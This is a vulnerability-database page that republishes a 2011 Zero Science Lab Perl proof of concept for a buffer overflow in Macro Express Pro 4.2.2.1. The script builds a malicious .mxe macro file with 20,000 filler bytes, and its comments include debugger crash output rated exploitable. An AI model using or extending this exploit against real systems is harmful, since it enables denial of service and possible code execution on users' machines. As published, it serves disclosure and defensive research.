Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Macro Express Pro 4.2.2.1 MXE File Syntactic Analysis Buffer Overflow PoC

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 27 Views

Macro Express Pro 4.2.2.1 MXE File Syntactic Analysis Buffer Overflow Po

Code

                                                #!/usr/local/bin/perl
#
#
# Macro Express Pro 4.2.2.1 MXE File Syntactic Analysis Buffer Overflow PoC
#
#
# Vendor: Insight Software Solutions, Inc.
# Product web page: http://www.macros.com
# Affected version: 4.2.2.1 and 4.2.1.1
#
# Summary: Macro Express is the premier Windows macro utility. With
# Macro Express, you can record, edit and play back mouse and keyboard
# macros. Its powerful tools and robust features will make you more
# productive.
#
# Desc: Macro Express Pro suffers from a buffer overflow vulnerability when
# importing playable macro files (.mxe) with added large amount of bytes into
# the elements: string, integer, float and control. The user input is not
# properly sanitized which may give the attackers the possibility for an
# arbitrary code execution on the affected system. Failure of exploitation
# may result in a denial of service.
#
# ~ Note: The PoC file is made with the script:
#
# <OPEN FOLDER Path="%ALLUSERSPROFILE%"/>
#
# Which when double clicking the .mxe poc file, 100% CPU usage and OS
# hanging occurs.
#
# ~
#
# Tested on: Microsoft Windows XP Professional SP3 (EN)
#
#
# -------------------------------------------------------------------
#
# (db0.37c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414141 ebx=00000000 ecx=00000000 edx=01171cd8 esi=01171cd8 edi=00000000
# eip=7c919af2 esp=0014f288 ebp=0014f2fc iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
# ntdll!RtlpWaitForCriticalSection+0x5b:
# 7c919af2 ff4010          inc     dword ptr [eax+10h]  ds:0023:41414151=????????
# 0:000> g
# (db0.37c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414141 ebx=0116ca00 ecx=0114dc90 edx=41414140 esi=41414140 edi=0014f330
# eip=0042633d esp=0014e870 ebp=0014e8a0 iopl=0         nv up ei ng nz ac pe cy
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010297
# macedit+0x2633d:
# 0042633d 8b04b0          mov     eax,dword ptr [eax+esi*4] ds:0023:46464641=????????
# 0:000> !exploitable
# Exploitability Classification: EXPLOITABLE
# User Mode Write AV starting at ntdll!RtlpWaitForCriticalSection+0x000000000000005b (Hash=0x351d4e4e.0x3f68114b)
# 
# User mode write access violations that are not near NULL are exploitable.
#
# -------------------------------------------------------------------
#
#
# Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
#
# Zero Science Lab - http://www.zeroscience.mk
#
# Advisory ID: ZSL-2011-4986
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4986.php
#
# 06.01.2011
#


use strict;

print qq{

------------------------------------------------------------------------------
|                                                                            |
| Macro Express Pro 4.2.2.1 MXE File Syntactic Analysis Buffer Overflow PoC  |
|                                                                            |
|                    Copyleft (c) 2011, Zero Science Lab                     |
|                                                                            |
------------------------------------------------------------------------------
	};

my $bytes = "\x41" x 20000;

my $format = "<<Macro Express 4 Playable Macro>>\x0d\x0a".
	     "[string:%$bytes% elements:99 global:true]\x0d\x0a". # Default: string:%T%...
	     "[integer:%N% elements:99 global:true]\x0d\x0a".
	     "[float:%D% elements:99 global:true]\x0d\x0a".
	     "[control:%C% elements:99 global:true]\x0d\x0a".
	     "<<BEGIN SCRIPT>>\x0d\x0a".
	     "<OPEN FOLDER Path=\"%ALLUSERSPROFILE%\"/>";

my $file = "Playable.mxe";
print "\n\n[*] Creating $file file...\n";
open mxe, ">./$file" || die "\nCan't open $file: $!";
print mxe $format;
print "\n[.] File successfully mounted!\n\n";
close mxe;

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
insight software solutionsmacro express probuffer overflowarbitrary code executiondenial of servicewindows xpexploitzero science lab
27